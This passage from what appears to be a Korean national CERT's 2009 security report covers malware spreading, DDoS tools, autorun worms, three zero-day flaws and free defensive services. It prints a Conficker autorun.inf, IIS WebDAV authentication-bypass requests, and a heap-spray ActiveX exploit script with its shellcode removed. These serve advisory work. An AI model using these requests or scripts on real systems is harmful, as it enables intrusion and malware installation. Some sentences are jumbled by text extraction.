( 그림 3-13) 특정그룹을대상으로하는공격의예 악성코드의유포는주로 Adobe Acrobat/Reader 신규취약점을 악용하는 Adobe Acrobat Reader PDF 파일또는쉘코드가포함된 DOC/ XLS/PPT 문서파일을메일의첨부로전송하여이루어지는데, 해당메일 이나 PDF 파일의 내용이공격대상기업이나기관의직원이아무런 의심을갖지못하게정교하게이루어지는것이특징이다. 그외에도 특수하게조작된페이지로방문하도록유도하여신규 IE 취약점을악용하여악성코드를다운로드하는경우가있다. Adobe Flash나 국내에서는실시간검색순위상위에오른검색어와관련된동영상을 올린것처럼속이고해당동영상을클릭했을때플레이어나코덱을설치 한다고가장하여소위 허위 악성코드제거프로그램을설치하는 Zlob 계열의악성코드가발견되었다. 또한블로그나인터넷커뮤니티게시판 등을통해게임프로그램패치, 게임해킹도구로속여서 Netbot을유포하는 경우도많이발생하고있다. - 83 -

( 그림 3-14) Zlob 전파방식의예 2009 년한해동안에마이클잭슨사망사건같은국내외로사회적인 이슈가많이발생하여인구에회자되었다. 이러한사회적인이슈는악성 코드및스팸제작자들에게는자신들이제작한악성코드전파를위한매우 좋은기회로활용되었다. 현재까지발견된신종플루관련악성코드나 주요사회이슈관련스팸은영어로작성된메일을기반으로유포되고 있고공격의주요목표도해외은행의인터넷계정을탈취나스팸을 발송하기위한것이라서국내의직접적인위협은상대적으로적은편이다. 하지만앞으로도이러한보안위협이국내외에서계속발생할것으로 예상된다. 대부분의스팸발송은감염된개인 PC를공격수단으로이용 하므로인터넷이용자는자신의 PC가침해사고유발을위한좀비 PC로 악용되지않도록항상악성코드감염에주의해야한다. 인터넷이용자들은 - 84 -

게시글및수신된메일확인시이러한점을감안하여접속및다운로드를 주의해야한다. 4. DDoS 자동화도구를이용한공격지속 최근발생하는 DDoS 공격의추세를살펴보면 Netbot Attacker와같은 자동화된공격도구를통한공격이주를이루고있다. 이는컴퓨터에대한 전문화된배경지식이없더라도공격도구설명서에따라누구나쉽게 DDoS 공격을수행할수있기때문이다. 지난해의 Netbot에이어올해는풍운(FengYun) 이라는DDoS 공격도구가 중국의관련판매사이트및커뮤니티에서거래되고있다. Netbot 과 마찬가지로풍운도사용자인터페이스(UI) 를제공하여단시간에손쉽게 DDoS 에이전트를대량생산이가능하며, 이로써변종악성코드의출현 주기가짧아져이에대한대응시간의지연을초래한다. ( 그림 3-15) DDoS 공격모드설정화면 - 85 -

풍운은단일좀비 PC에서대량의공격용트래픽을발생시킬수있어 보다적은수의좀비 PC만으로도위협적인공격이가능할것으로예상 된다. 풍운과 ( 그림 9) 와같이다양한유형의공격트래픽을선택적으로 DDoS 공격을수행할수있다. 또한부가적인기능으로추가악성코드 원격다운로드, 무한 HTTP 다운로드, 로그오프, 종료, 방화벽종료와같은명령을내릴수있다. [ 표 3-7] 풍운의공격유형 공격모드 트래픽모드 공격유형 UDP, SYN, TCP, ICMP, TCP 동시, UDP+TC, UDP+ICMP, UDP+SYN, 혼합공격, 혼합연결공격 사이트모드 DvBBS 모드, 고강도CC, 무한CC 5. USB 전파악성코드 Autorun 은이동식드라이브가연결되었을때시스템이취할동작을 지정하는 MS 윈도우의기능이다. 즉, USB, CD, DVD와같은이동매체로 배포되는응용프로그램을설치/ 구성하거나실행하는절차를자동화한 것이다. 윈도우즈 95부터포함된 Windows Explorer(shell32.dll) 의기능 으로저장장치의루트폴더에저장되어있는 "autorun.inf" 라는파일에 포함되어있는명령어를통해특정미디어혹은특정프로그램이실행 되도록할수있다. [AutoRun] Action=Open folder to view files Icon=%systemroot%\system32\shell32.dll,4 Shellexecute=.\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn [ 표 3-8] Conficker의 autorun.inf 파일 - 86 -

하지만사용자의편의를위해만들어진 Autorun 기능을악용하여 전파되는악성코드가많이발생하고있다.Microsoft의보안동향보고서인 Security Intelligence Report 의 2009년상반기통계에의하면한국에서 감염률상위 3위에해당하는악성코드는 Taterf, Frethog, Conficker 인데, 모두 Autorun 기능을통한전파기능을가지고있다. 진흥원자체월간 보고서인 인터넷침해사고동향및분석월보 의결과도 Conficker, Autorun 과같은진단명을갖는악성코드가상위에포함되어있음을 확인할수있다. [ 표 3-9] Autorun 비활성화를위한레지스트리키 HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\ Autorun 기능을비활성화하기위해 KB967715 보안업데이트를설치한 후에 1) 그룹정책설정(gpedit.msc) 을사용하여모든 Autorun 기능을 비활성화하거나 2) 특정레지스트리키에 NoDriveTypeAutoRun 항목을 추가또는변경하여선택적으로 Autorun 기능을비활성화가가능하다. - 87 -

제 4 절주요취약점분석및대응 2009년에도해킹공격에악용될수있는다양한취약점이발견되어주의가필요하다. 주요취약점에대하여소개하면다음과같다. 1. IIS WebDAV 인증우회취약점 가. 개요 지난 5월에발표된 IIS WebDAV (Internet Information Services Web-based Distributed Authoring and Versioning) IIS (5.0, 5.1, 6.0) 에악의적으로작성된HTTP 인증우회취약점은 요청을이용하여인증을 우회함으로써패스워드로보호된자원에접근이가능한취약점이다. 취약점을이용하여인증을우회할경우, 공격자는비밀번호로잠근 디렉토리를열람하거나파일의다운로드또는업로드가가능하다. 나. 취약점설명 IIS WebDAV 인증우회취약점은지난 2001년도에발생한 IIS (4, 5) 관련취약점(MS01-26) 과마찬가지로유니코드문자를처리하는과정에서발생하는취약점이다. 비밀번호로보호되는폴더의파일을다음과같이 GET 명령어에유니코드를포함하여요청을하게되면인증을거치지않고파일에접근이가능하게된다. GET /%c0%af/secured/secured.zip HTTP/1.1 Translate:f 이명령어에서유니코드%c0%af 는 / 를나타내며Translate:f에의해 해당요청을받은 WebDAV 가유니코드를무시하면서인증이우회된다. - 88 -

이러한공격은 Translate:f 키워드를사용할수있는다른요청에의해서도악용될수있다. 다음은취약점을이용하여파일을다운로드및업로드하는명령이다. PROPFIND /secu%c0%afred/secured.zip HTTP/1.1 Host:servername 이경우에도,IIS 는암호를묻지않고요청을처리한다. 이러한취약점은 IIS 5.0, 5.1, 6.0에서만영향을미치고 IIS 7.0에는영향을미치지않는다. IIS 5.0, 5.1, 6.0 을사용하고있는웹서버중에서보안패치를적용할수 없거나 IIS 7.0 으로업그레이드할수없는경우, WebDAV를사용하지 않음으로써취약점으로부터피해를예방할수있다. 참고로 IIS 6.0 의경우, 기본적으로 WebDAV 가비활성화되어있다. 다. 영향력분석 해당취약점은공격자가보안패치가적용되지않은웹서버에접근을 시도할경우, 인증을우회할수있는취약점이다. 국내의많은웹서버에서 사용하고있는 IIS(Internet Information Services 5.0, 5.1, 6.0) 에영향을 미치므로각별한주의가요구된다. 서버관리자는 MS09-020 보안패치를 적용하거나 방지하여야한다. IIS 7.0으로업그레이드함으로써보안사고및피해를미연에 라. 대응조치 IIS WebDAV 인증우회취약점은제로데이취약점으로패치가보급되기 전에공격코드가공개되어 KrCERT홈페이지에 5월 19 일 Microsoft IIS(5,5.1,6) WebDAV 취약점으로인한피해주의 로공지하였다. 이후 MS09-020 보안패치가 6월 10일에발표되어보안공지문을업데이트하였다. - 89 -

2. MS 비디오스트리밍 ActiveX 컨트롤(msvidctl.dll) 제로데이취약점 가. 개요 MS 비디오스트리밍 ActiveX 취약점은 Data속성에입력된 gif파일 크기를처리하는과정에서버퍼오버플로가발생하는취약점이다. 즉 MS 비디오스트리밍 ActiveX 취약점은 ActiveX 취약점과파일포맷처리 취약점이복합된형태의취약점이다. 해당취약점은중국에서개념증명 코드가공개된이후 7월 7 일마이크로소프트社에서보안공지를발표하였다. SANS 에서는실제해당취약점이악용되는몇몇사이트를공개하였는데 아래그림은해당취약점을이용한악성코드다운로드흐름이다. ( 그림 3-16) 취약점을이용한악성코드다운로드흐름 취약점을이용한공격방법은취약 ActiveX 호출스크립트로구성되어 있는페이지와악성코드를원격시스템에업로드하고페이지를유명 웹사이트혹은게시판에 iframe 을이용하여삽입한다. 피해자가해당 페이지에접속할시취약한 msvidctl.dll 은쉘코드를실행시키고원격지에서 악성코드를다운로드및실행한다 - 90 -

나. 취약점설명 해당취약점은 MS 비디오스트리밍 ActiveX의 Data속성을처리하는 msvidctl.dll 모듈이 버퍼오버플로취약점이다. gif파일내데이터크기를체크하지않아발생하는 취약점을발생시키기위해서는클래스아이디를이용하여 MS 비디오 스트리밍 ActiveX를호출하고 Data속성에 logo.gif 파일을입력하면된다. 이때, 힙스프레이기법을이용하여힙영역에쉘코드를업로드할수있다. [ 표 3-10] ActiveX 취약점이용코드 var appllaa='0'; var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa; [SHELL CODE REMOVED] // 쉘코드는생략함 // 쉘코드및 NOP 구성스크립트는생략함 memory=new Array(); for(x=0;x<300;x++) memory[x]=shuishimvp+dashell; // 힙메모리영역에 NOP와쉘코드업로드 // 클래스아이디를이용해 ActiveX 호출 var myobject=document.createelement('object'); DivID.appendChild(myObject); myobject.width='1'; myobject.height='1'; myobject.data='./logo.gif'; // ActiveX에서제공하는 data에 logo.gif 파일입력 myobject.classid='clsid:0955ac62-bf2e-4cba-a2b9-a63f772d46cf'; 취약한 msvidctl.dll 내 ReadFromStream함수는 logo.gif파일에서파일 크기정보(0x34) 를읽어그크기만큼스택에덮어쓴다. - 91 -

logo.gif 내데이터크기 52 바이트 (0x34) ( 그림 3-17) Data 속성에입력되는 logo.gif파일 데이터처리를위한스택공간이 52바이트보다작기때문에스택내 예외처리함수주소저장공간(SEH) 이변경되고다음명령어처리 레지스터(EIP) 가변경된다. ( 그림 3-18) 변경된예외처리함수저장공간 힙스프레이기법을이용하여 실행되고악성코드가설치된다. 0C0C0C0C주소영역에업로드된쉘코드가 다. 영향력분석 해당취약점은보안패치를적용하지않은사용자가조작된웹페이지를 방문할경우, 원격의악성코드를다운로드및실행시키는취약점이다. 또한 가장많은사용자가사용하고있는윈도우즈 XP 및서버 2003 버전에 영향을미치므로주의가요구된다. 사용자는 MS09-032 보안패치를 적용하고보안사고및피해를미연에방지하여야한다. 라. 대응조치 MS 비디오스트리밍 ActiveX 취약점은제로데이취약점으로패치가 - 92 -

보급되기전에공격코드가공개되어 KrCERT홈페이지에 7월 7 일 MS 비디오스트리밍 ActiveX 컨트롤취약점주의 로공지하였다. 이후 MS09-032 보안패치가 7 월 15 일에발표되어보안공지문을업데이트하였다. 3. Adobe Reader/Acrobat 제로데이취약점 가. 개요 2009년 12월 15일어도비사는자사홈페이지를통하여 Adobe Reader/ Acrobat 에서원격코드실행이가능한신규제로데이취약점이발견되었다고 발표하였다. 실제 12월 11일경부터해외에서는이미취약점을공격하기위해 악의적으로작성된 파일은 PDF 파일이이메일을통해전파되고있었다. 조작된 PDF Adobe Acrobat Reader 9.2 이하의모든버전에서해당취약점을 악용하여악성코드감염을시도하였다. 이후,2010년 1월 13일에 Adobe사의 홈페이지를통해업데이트가발표되었다. 나. 취약점설명 이취약점은9.2 이하버전의Adobe Acrobat Reader에서조작된 PDF 파일을읽었을경우, 원격코드실행이가능한취약점이다. 본취약점은 제로데이취약점으로서, 업데이트가발표되기한달전부터이메일을 통해관련악성 PDF 파일이유포되었다. 악성 PDF 파일은주로이메일에 note_20091210.pdf" 와같은이름의 첨부파일형태로유포되며, 해당 PDF 파일내부에는악성코드가삽입되어 있다. 아래그림에서조작된 PDF 파일의 0x37761번지에 PE 파일이삽입된 것을확인할수있다. - 93 -

( 그림 3-19) Adobe Acrobat Reader PDF에삽입된악성코드 조작된 PDF 파일을사용자가열어봤을경우에, 삽입되어있는악성코드가 실행되며다음과같이악성코드유포사이트에접속을시도한다. ( 그림 3-20) 악성코드유포사이트접속악성코드유포사이트에접속되면추가악성코드의다운로드를시도한다. ( 그림 3-21) 추가악성코드다운로드 본취약점은 9.2 이하버전의 Adobe Reader/Acrobat에서사용되는 Doc.media.newPlayer 자바메소드에존재하는메모리손상취약점때문이다. 따라서다음과같이메뉴에서 JavaScript 사용기능을비활성화시키면 - 94 -

취약점으로인한피해를예방할수있다. ( 단, JavaScript를사용하는 일부 PDF 파일에대해서정상적인사용이불가능할수있다.) ( 그림 3-22) Acrobat JavaScript 사용기능비활성화 다. 영향력분석 해당취약점을이용한공격이성공하기위해서는사용자컴퓨터에 9.2 버전이하의 Adobe Reader/Acrobat 가설치되어있어야하고 사용기능이활성화되어있어야한다. 국내에서 많이사용되는있는문서편집기중하나이고 JavaScript Adobe Reader/Acrobat 가 JavaScript 기본적으로활성화되어있기때문에각별한주의가요구된다. 사용기능이 사용자는 Adobe Reader/Acrobat 을사용할경우, 9.3 이상의버전으로업데이트하여 사용하도록한다. 라. 대응조치 Adobe Reader/Acrobat 취약점은제로데이취약점으로패치가보급되기 - 95 -

전에공격코드가유포되어 KrCERT홈페이지에 2009년 12월 16일 Adobe Reader/Acrobat 신규취약점으로인한피해주의 로공지하였다. 이후보안패치가 2010년 1월 13 일에발표되어보안공지문을업데이트하였다. 4. 2009년 ActiveX 취약점점검실시결과 가. 개요 Microsoft 社의제품군에대한보안이강화됨에따라최근응용프로그램 취약점에대한공격이증가하고있다. 특히 2009년에발표된 IBM 보고서는 브라우즈관련취약점중 ActiveX 취약점이 60% 이상을차지하고있다고 발표했다. 일반사용자의경우, ActiveX 이름과게시자를표기하는코드 사이닝을안전성의기준으로생각하고있다. 그러나실제코드사이닝은 프로그램개발자및사업자가누구인지제3의신뢰된공인인증기관이 전자서명을인증하는절차에불과하다. 이에따라대응센터는 ActiveX 컨트롤에의존도가높은국내사이트에대한전반적인점검이필요하다고 판단하고 ActiveX 존재사이트 1,000개사이트에대하여취약점점검을실시 하였다. 나.ActiveX 취약점의위험성 Microsoft社는Sun Microsystems 社의자바(Java) 기술에대항하기위해 웹관리자가원격에서사용자의시스템을제어하는기능을 ActiveX를 통해제공하였다. 이에따라사용자는웹을통해더많은업무를처리할 수있게되었다. 즉기존에는웹에정적인문서만이존재하여정보공유 목적으로인터넷이사용되었으나현재는인터넷뱅킹, 게임등의동적인 활동이인터넷을통해가능하게되었다. 해커는이러한 ActiveX를사용자의 PC 를제어하기위해악용하기시작했다. ActiveX 취약점은무료공개 도구를사용하여분석할수있고악성코드유포방법이간단하여해커가 - 96 -

악용하기쉽다. 또한개발업체가여러사이트의 ActiveX를개발하기 때문에한개의취약한 효과가크다. ActiveX가다수의사이트에서사용되어파급 나.2009년취약점점검결과 진흥원대응센터는인터넷상에난립하고있는 성을검증하기위해 ActiveX컨트롤의안전 1,000개사이트에대하여취약점점검을실시하였다. 1,000개사이트는순위정보를제공하는 100hot사이트의약2,100개사이트중 약 1/2 에해당되며쇼핑몰, 은행, 공공기관, 게임사이트등이포함되어 있다. 취약점점검결과, 1,000개사이트중 534 개사이트(53.4%) 가 ActiveX 를사용중이었다. 534개사이트중93 개(17.4%) 사이트가취약한 버전의 ActiveX 를사용중인것이확인되었다. 1,000개의사이트는408개의 ActiveX를배포하고있으며이중34 개(8.3%) 의ActiveX 가취약하다. ActiveX 존재사이트비율 ActiveX 존재사이트 ActiveX 비존재사이트 47% 53% ( 그림 3-23) 선정된 1,000개사이트중 ActiveX 존재비율 - 97 -

다. 사이트분야별분포 1,000 개사이트를대상으로점검을시행한결과, 93개사이트가취약한 것으로조사되었다. 전체취약사이트중쇼핑몰사이트가 14개사이트로 약 15% 를차지하고있었다. 이는결제모듈에사용되는동일한컨트롤이 쇼핑몰사이트에서다수사용되기때문이다. 또한게임포털사이트는 5개 사이트로 5.3% 를종합포털사이트는 4개사이트로 4.3% 를차지하였다. ( 그림 3-24) 분야별취약사이트분포 라. 방문자수기준취약사이트의위험성 ActiveX를설치한사용자의수는취약점공격이성공할수있는피해자의 수를의미한다. 따라서취약점이발견된사이트의방문자수가해당취약점의 위험도를산출할수있는기준이된다. 즉 포털 A 社 사이트의취약점이 악용되었을경우,2008년 12월한달간하루평균약 3천만명의시스템이 감염될수있다. 감염된사용자는악성코드로인하여개인정보유출등의 피해를입을수있다. 아래도표는발견된취약사이트중방문자수기준 상위 8 개사이트이다. - 98 -

( 그림 3-25) 일일방문자수기준상위 8개취약사이트 (www.100hot.co.kr의 2008년 12 월통계참고) - 99 -

제 5 절웹취약점원격점검서비스 1. 개요 웹취약점원격점검서비스는인터넷홈페이지의침해사고예방에 기여하고자 2005년 12 월부터무료로점검서비스를제공하고있다. 신청인들은웹취약점원격점검서비스를통해침해사고예방및보안 수준제고를도모하고, 침해사고가발생한이후의재발방지를위한경우 에도효과적으로활용할수있다. 웹취약점원격점검을받기위해서는서비스홈페이지 (http://toolbox. krcert.or.kr) 에서점검희망사이트정보를입력하여신청하고, 그이후에는 점검신청사이트가서비스대상에포함되는지적격심사를거친후취약점 점검결과보고서를제공한다. 다만, 서비스제공범위를정보보호예산이 부족한비영리단체나영세업체등의정보보호취약계층으로제한하고있다. ( 그림 3-26) 웹취약점점검서비스절차개요 - 100 -

2. 웹취약점원격점검서비스제공절차 웹취약점원격점검은서비스홈페이지(http://toolbox.krcert.or.kr) 를 통해제공하고있으며서비스에대한안내와 제공하고있다. FAQ등의서비스도함께 ( 그림 3-27) 웹취약점원격점검서비스홈페이지서비스제공절차는, 신청자가서비스홈페이지에접속하여점검이필요한웹사이트를입력하면해당웹사이트에대한점검작업을수행하고결과보고서를발송하는순서로진행된다. - 101 -

( 그림 3-28) 웹취약점점검서비스세부절차 점검이완료되면결과보고서가이메일을통해발송되며, 신청인은점검 결과를검토하여보완조치를수행한다. ( 그림 3-29) 취약점점검결과보고서예시 - 102 -

3. 웹취약점점검서비스결과 2009년한해동안1,260 건의웹취약점점검서비스를제공하였으며, 연도별점검합계는아래의표와같다. [ 표 3-11] 웹취약점점검서비스제공누계 2005년 2006년 2007년 2008년 2009년합계( 건) 437 1,216 1,082 1,520 1,260 5,515 지난해보다점검서비스가소폭감소하였으며, 그원인으로는지난 08년의경우 자동화된 SQL Injection 공격을통한악성코드대량 삽입사고 로인해피해를입은홈페이지의점검요청이많았었기 때문이었다. 1) 참고로 09년의경우새로운공격유형이나대형 웹사이트침해사고의확산은없었다. 가. 웹취약점점검서비스통계 2009년 1,260건의취약점점검을수행한결과 21,000여개의취약점을 찾아내고권고하였다. 참고로웹취약점점검엔진은총 7,500여개의 웹취약점점검패턴중중요도가낮거나불필요한경우또는시스템 장애가우려되는점검패턴등을제거하여, 실제점검에서는약 3,500개의 점검패턴으로점검을수행한다. 점검을신청한업종구분별최다신청상위 10개분류로살펴보면 09 년과유사하게 인터넷을기반으로서비스하는웹/ 서버호스팅업체 가 가장많았으며, 인터넷쇼핑몰등의유통업체 가그뒤를이었다. 1) http://www.krcert.or.kr/technicaldoclist.do?seq=0-103 -

( 그림 3-30) 웹취약점점검요청사업자분류 나. 웹취약점점검결과통계 o 웹취약점별분류 점검에서발견된취약점에대해최다발견항목상위 통계를산출하면아래의그림과같으며, 취약점항목마다괄호에 중대성에대해 상, 중, 하 로표기하였다. 10개를기준으로 취약점의 - 104 -

( 그림 3-31) 최다발견상위 10개웹취약점 그리고상위 10개취약점에대해다시 6개항목에대해서만점유율을 살펴보면아래의그림과같다. - 105 -

( 그림 3-32) 2008년웹취약점상위 6가지취약점비율 취약점점검결과발견된취약점의중대성을기준으로나누어살펴보면 상 70%, 중 6%, 하 24% 의분포로나타났다. 웹취약점의특성상 개발이나관리상의사소한실수가그원인인경우가많으며, 중대한취 약점으로분류한 SQL Injection 이나 "Cross-Site Scripting" 의일반적인 경우에는보완조치가어렵지않기때문에취약점의중대성과보완조치의 어려움이비례하지는않는다. ( 그림 3-33) 취약점중대성비율 - 106 -

웹취약점의유형별로구분하여보면부적절한입력값검증으로인한 문제가가장많았으며시스템정보노출관련취약점과서버보안설정 문제가그뒤를이었다. [ 표 3-12] 웹취약점유형별통계 취약점유형 취약점누계 부적절한입력값검증 14,369 시스템내부정보노출 3,223 서버보안설정문제 1,898 부적절한어플리케이션관리 1,068 부적절한입력값검증 은웹프로그램상에서입력되는값들에대해 처리할수있는적절한값인지확인해야하는절차가없거나부적절하여 SQL Injection이나 Cross-Site Scripting 등의취약점이존재하는경우이며, 시스템내부정보노출 은오류출력내용에시스템내부정보가포함되어 있거나웹페이지소스상에시스템디렉토리등이노출된경우등이 포함된다. 서버보안설정문제 의경우에는웹서버에 WebDAV기능이 제한없이활성화되어있거나디버깅모드가설정되어있는경우,HTTP 메소드중에 PUT이나 DELETE 메소드가활성화되어있는경우등이 포함된다. 마지막으로 부적절한어플리케이션관리 에는테스트용 임시파일이다운로드되거나프로그램소스디렉토리의압축파일이나 백업본이남아있어다운로드되는경우등이포함된다. 유형별비율로는 이러한취약점 부적절한입력값검증 이절반이상을차지한다. - 107 -

( 그림 3-34) 웹취약점유형별비율 o 조치대상구분별통계 웹취약점원인과그보완조치의관점에서프로그램상의문제와 웹서버관리상의문제로나누어보면, 웹사이트의프로그램에관련된 취약점이 86% 를차지하고있다. 그러므로안전한웹사이트가구축되도록 보안이강화된개발절차를확립하고개선하는노력이얼마나중요한지 잘나타내고있다. [ 표 3-13] 조치구분별통계구분누계프로그램보완조치 17,592 서버관리및설정강화 2,966-108 -

( 그림 3-35) 조치대상구분별비율 다. 보완조치기술지원 취약점점검결과보고서에는발견된취약점에대한보완조치방안및참고자료들이함께기술되어있으며결과보고서메일본문을통해서도기술문서목록을제공하고있다. 그리고점검결과에대한상담이나기술지원도전화와이메일을통해함께제공하고있다. 다만, 웹취약점의특성상프로그램을수정해야하는경우가대부분이기때문에개발인력이부족하거나보안조치에대한이해가충분하지않은경우에는보완조치가되지않거나조치에필요한소요시간이늘어나는어려움이있다. 그러므로프로그램수정과함께보안수준을확보할수있는방안으로 공개웹방화벽, 휘슬, 캐슬등의웹보안강화도구를서비스홈페이지 http://toolbox.krcert.or.kr 을통해제공하고있다. - 109 -

4. 웹보안강화서비스통합확대개편 웹취약점점검서비스를포함한진흥원의웹보안강화도구들을한곳에서 통합제공할수있도록서비스를확대개편하였다. 가. 웹취약점원격점검시스템고도화 웹취약점원격점검은신청접수, 점검엔진관리, 보고서발송등의 서비스운영을담당하는웹사이트부분과실제취약점점검을수행하는 점검엔진으로나뉜다. 점검엔진의경우 09년상반기까지는한대의 엔진에서점검및운영되었으나, 하반기에점검엔진을증설하고 엔진관리를관리서버에서분리하여점검엔진의추가가용이하도록개발 하였다. 그러므로, 그이전까지는점검작업이직렬로운영되면서점검에소요되는 리드타임을줄일수없었으나, 점검엔진증설후에는다수의점검을 동시에수행할수있게되면서점검신청이대폭증가해도대응할수 있도록구현하였으며, 구축하였다. 필요한경우점검엔진을손쉽게추가할수있게 나. 웹보안강화사업통합 진흥원에서보급중인웹보안강화도구들은 제공하고, KrCERT/CC 홈페이지에서 공개웹방화벽의경우는시큐어넷에서제공하면서이용자들의 불편이있어왔다. 09년하반기에통합확대개편된서비스홈페이지 http://toolbox.krcert.or.kr 강화도구를 에서는진흥원이보급하고제공하는웹보안 One-Stop으로제공할수있게되어이용자들의불편을 줄이고더욱더효과적인웹보안강화서비스를제공할수있게되었다. - 110 -

( 그림 3-36) 웹보안강화통합서비스사이트 - 111 -

제 6 절 PC 원격점검서비스 1. 서비스개요 진흥원은지난 2006년 3월부터 PC사용에어려움이있거나도움이필 요한정보보호취약계층의정보보호수준강화에기여하기위해 PC원격점검 서비스를제공하고있다. PC원격점검서비스는신청인의동의하에신청인 PC 에원격에서점검하고정보보호를위한상담과기술지원을제공한다. ( 그림 3-37) PC원격점검서비스개요 - 112 -

2. 점검서비스제공절차 PC 원격점검서비스는신청인이보호나라웹사이트(www.boho.or.kr) 를통해서비스를신청할수있다. ( 그림 3-38) 보호나라홈페이지의 PC원격점검서비스안내 점검신청페이지에는연락처와함께간단한요청내용을기재하여제출한다. ( 그림 3-39) PC원격점검서비스신청페이지 - 113 -

점검신청이완료되면원격접속동의절차를거친후, 서버를통해신청자의 원격접속중계 PC 에접속하여분석및기술지원을제공한다. ( 그림 3-40) PC 원격점검서비스절차 3. PC 원격점검서비스결과 2009년에는총 3,847 건의서비스를제공하였으며, 월별로는평균약 320건 정도의점검서비스가제공되었다. 7월에는평균대비약 5배가량점검 서비스가증가하였는데그이유로는 7월 7일발생한 DDoS 사고후악성 코드나봇의감염이의심되는 PC이용자의점검신청이증가했기 때문이다. [ 표 3-14] PC 원격점검연간실적 1 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월합계 175 246 268 135 135 181 1,462 266 210 231 239 299 3,847-114 -

원격점검서비스를마치고나면 PC 에설치된웜, 바이러스, 백도어 등의악성프로그램이제거된상태이지만, 재발방지를위해반드시 바이러스백신프로그램및 PC자동보안업데이트를설치하도록권고하고 있다. 그리고 2010년부터는 118 상담센터가확대개소되어더욱더신속 하고편리한서비스제공이될것으로기대하고있다. - 115 -

제 7 절휘슬캐슬 보급및결과 1. 개요 최근취약한홈페이지를대상으로악성코드유포및개인정보유출침해사고가지속적으로증가하고있다. 대응센터는 2009년 1월홈페이지관리자들이해당사이트의취약점공격을효율적으로차단하고, 쉽게운영할수있는캐슬도구를개발하여보급을시작했다. 또한공격자들이피해웹서버의관리를용이하게할목적으로악성웹스크립트웹쉘을은닉시켜지속적으로피해시스템에연결을시도한다. 대응센터는웹서버관리자들이쉽게웹쉘을탐지할수있도록자동화하고, 쉬운화면을제공하는웹쉘탐지도구, 휘슬을보급하고있다. 진흥원에서는웹쉘탐지도구로우선악성웹쉘을제거한뒤, 보완할수있는캐슬을적용하기를권고하고있다. 취약성을 2. 휘슬소개 홈페이지침해사고에서웹쉘이지속적으로발견되는것을파악한대응 센터는사고분석의효율성을위해서사고분석도구 WebShell Finder 를 자체개발하여사용해왔다. 이후인터넷에서유통되는대부분의웹쉘을 수집하면서배포용버전인휘슬을개발하여 2008년 10월에휘슬을보급 하였다. 많은관리자들이휘슬이탐지하는웹쉘을제거하고있으며휘슬은 국내홈페이지보안에큰공헌을하고있다. - 116 -

( 그림 3-41) 휘슬기능및서비스개요도 휘슬도구는웹서버관리자들이사용하는클라이언트프로그램과 대응센터에서운영하는관리서버프로그램으로구분된다. 먼저사용자 클라이언트프로그램은다음과같은기능을보유하고있다. o 웹쉘자동탐지 o 다양한홈페이지개발언어지원 (ASP, PHP, JSP 웹쉘탐지) o 웹쉘탐지패턴의자동업데이트 o 은닉형웹쉘탐지 ( 인코딩웹쉘등) o 검역소이동및로깅기능제공 o 예약및미탐 오탐파일신고기능제공 서버에서는웹쉘탐지패턴을제공, 보급업체관리, 탐지결과관리, 신고기능등을제공하고있다. 3. 캐슬소개 캐슬은홈페이지주요취약점을개발언어수준에서해결하도록도와주고, - 117 -

간단한작업만으로도적용가능한보안강화도구이다. 홈페이지개발자는개발단계에서이도구를적용할수있고, 관리자는홈페이지운영단계에서적용할수있다. 또한홈페이지별로따로적용할수있기때문에공개웹방화벽같이서버수준이아닌홈페이지수준에서보안강화를할수있다. 주요기능은다음과같다. o 홈페이지공통참조파일에적용 oget,post,cookie,files의사용자데이터검사 o 설치및관리기능을제공하여사용자들이쉽게유지보수할수있음 o 감사모드를제공하여탐지규칙정책을사용자환경에맞게최적화 o 로깅기능을통한탐지내역확인 4. 휘슬/ 캐슬보급결과 o 휘슬보급현황 : 08년 419건 -> 09년 936건보급 o 캐슬보급현황 : 09년 7080 건보급 ( 09년 1 월보급시작) - 118 -

제 8 절웹사이트보안수준확인시스템 1. 개요 진흥원에서는이용자 PC 의웹브라우저에설치되어, 이용자가방문한웹 사이트에대한악성코드은닉, 피싱사이트여부등위협정보를안내해주고 대응센터에서제공하는보안공지사항과, 주요사이버보안관련뉴스 기사를제공하는웹체크(WebCheck) 프로그램을개발하여보급하고있다. 부가기능으로제공하는해킹신고118 기능과 PC원격점검기능을통해이용 자들은해킹/ 바이러스등으로인한피해신고및복구서비스를좀더 빠르고편리하게제공받을수있다. ( 그림 3-42) 웹체크서비스개요도 2. 웹체크구동환경 웹체크를이용할수있는 o 운영체제 PC환경은아래와같다 : Windows XP / VISTA o 웹브라우저 : 인터넷익스플로러 6.0, 7.0, 8.0 버전 파이어폭스 3.0, 3.5 버전 - 119 -

3. 웹체크화면소개 웹체크화면은크게한웹사이트의위협정보를표시해주는화면, 보안공지/ 뉴스제공화면, 부가기능버튼등으로구분될수있으며세부화면소개는아래와같다. ( 그림 3-43) 웹체크화면안내 1 웹사이트보안수준알림신호등 초록( 신뢰) : 악성코드( 진흥원에서탐지한) 가은닉되어있지않으며, 사기성피싱사이트도아닌신뢰할수있는금융기관사이트 파랑( 양호) : 악성코드( 진흥원에서탐지한) 가은닉되어있지않으며, 사기성피싱사이트도아닌사이트 노랑( 주의) : 최근 3 개월내에악성코드가유포된적이있어, 비교적 빨강( 위험) : 보안이취약한웹사이트 악성코드가유포되고있거나사기성피싱사이트로확인된사이트 2 보안공지및보안뉴스 진흥원대응센터에서제공하는보안공지사항제공 주요언론사의사이버보안관련온라인뉴스제공 3 웹사이트보안정보간략보기툴팁메시지 신호등그림에마우스포인터를올려놓으면펼쳐지는화면으로써, - 120 -

악성코드은닉여부, 피싱사이트여부, 암호화통신여부등웹사이트에대한위협정보를한눈에볼수있도록요약하여보여준다 4 해킹신고 118 보호나라홈페이지에서제공하는해킹/ 바이러스/ 스팸등각종 인터넷피해에대한신고안내페이지로이동한다 5 PC 원격점검신청 사용중인 PC 가해킹/ 바이러스등의피해를입었으나스스로해결이 불가능한경우진흥원상담원이직접 PC에접속하여악성코드 ( 해킹툴, 바이러스, 스파이웨어등) 를제거하고보안관련기본사항을 점검해주는무료서비스신청 6 사이트정보 3툴팁메시지창에서간략히보여준내용에대한상세정보를 보여준다 - 121 -

